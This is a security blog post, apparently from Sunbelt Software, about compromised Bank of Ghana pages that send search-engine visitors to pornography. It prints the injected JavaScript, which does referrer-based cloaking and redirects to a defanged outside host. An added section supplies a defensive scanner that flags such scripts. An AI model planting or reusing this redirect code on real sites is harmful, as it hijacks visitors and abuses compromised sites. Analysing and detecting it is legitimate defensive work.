
Bank of Ghana, others, compromised

The Bank of Ghana is serving porn.

A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):

http://www.sunbelt-software.com/ihs/alex/bankofghana1238888_thumb.jpg


Narrowing down the search a wee bit:

http://www.sunbelt-software.com/ihs/alex/ghana0_10912332_thumb.jpg


Ouch, nasty stuff.

These pages redirect to porn (graphic content).

http://www.sunbelt-software.com/ihs/alex/ghanaresults1299123_thumb.jpg


The code checks the referrer for search engines and redirects only visitors who arrive from a search results page. Example:

http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js

    function f(){
      var r=document.referrer,t="",q;
      // Pick the query-string parameter that each search engine uses for the search term
      if(r.indexOf("google.")!=-1)t="q";
      if(r.indexOf("msn.")!=-1)t="q";
      if(r.indexOf("yahoo.")!=-1)t="p";
      if(r.indexOf("altavista.")!=-1)t="q";
      if(r.indexOf("aol.")!=-1)t="query";
      if(r.indexOf("ask.")!=-1)t="q";
      if(r.indexOf("comcast.")!=-1)t="q";
      if(r.indexOf("bellsouth.")!=-1)t="string";
      if(r.indexOf("netscape.")!=-1)t="query";
      if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
      if(r.indexOf("peoplepc.")!=-1)t="q";
      if(r.indexOf("starware.")!=-1)t="qry";
      if(r.indexOf("earthlink.")!=-1)t="q";
      // Redirect only when the referrer URL carries that search parameter
      if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
        window.location=("http://grandsupport(dot)net/td/in(dot)cgi?13&seoref="+encodeURIComponent(document.referrer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=fetish");
    }
    // f() is called immediately here; its return value (undefined) is what gets assigned
    window.onFocus = f()

This loads the site grandsupport(dot)net.
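For site owners checking their own pages for this pattern, here is an added example (not code from the original post) of a static heuristic that flags scripts which test document.referrer against search-engine names and then navigate the window. The function name scanScript, the threshold of two engine names, and the sample scripts with the host redirect.example are assumptions made for illustration.

```javascript
"use strict";
// Substrings the sample on this page tests document.referrer against.
const ENGINES = ["google.", "msn.", "yahoo.", "altavista.", "aol.", "ask.",
  "comcast.", "bellsouth.", "netscape.", "mywebsearch.", "peoplepc.",
  "starware.", "earthlink."];

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

// Heuristic (assumption, not a parser): flag a script that compares the
// referrer with two or more search-engine names and also navigates the window.
function scanScript(src) {
  // Collect names bound to the referrer, e.g. `var r=document.referrer`.
  const names = ["document.referrer"];
  for (const m of src.matchAll(/([A-Za-z_$][\w$]*)\s*=\s*document\.referrer\b/g)) {
    names.push(m[1]);
  }
  // Find indexOf()/includes() tests of those names against engine substrings.
  const engines = new Set();
  for (const n of names) {
    const re = new RegExp("(?:^|[^\\w$])" + escapeRe(n) +
      "\\.(?:indexOf|includes)\\(\\s*[\"']([^\"']+)[\"']", "g");
    for (const m of src.matchAll(re)) {
      const lit = m[1].toLowerCase();
      for (const e of ENGINES) if (lit.includes(e)) engines.add(e);
    }
  }
  // Assignment to location / location.href, or location.replace()/assign().
  const navigates =
    /\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:replace|assign)\s*\(/.test(src);
  return {
    engines: [...engines].sort(),
    navigates,
    suspicious: engines.size >= 2 && navigates,
  };
}

// Constructed samples; redirect.example is a placeholder host.
const CLOAKED = `function f(){var r=document.referrer,t="";
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(t.length)window.location="http://redirect.example/in?ref="+encodeURIComponent(r);}
f();`;
const ANALYTICS = `var ref=document.referrer;
if(ref.indexOf("google.")!=-1){counter.hit("search");}`;
const MENU = `function go(u){window.location.href=u;}`;

console.log(scanScript(CLOAKED), scanScript(ANALYTICS), scanScript(MENU));
```

A hit is a prompt for manual review of the file, since obfuscated or server-side variants of the same cloaking will not match these patterns.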

Let’s hope they get this cleaned up soon (we have notified them).

Alex is a technology CEO, with leadership, operating partner, investor, and board member roles at security firms including AutoLoop, Borland, Quarterdeck (now Symantec and Cisco WebEx), GFI/TeamViewer, Sunbelt Software (now ThreatTrack Security), BlueStripe Software, StopBadware, Knowbe4, Malwarebytes, and Runaware Holding AB. When CEO of Sunbelt he ran a security blog, and he still writes on security.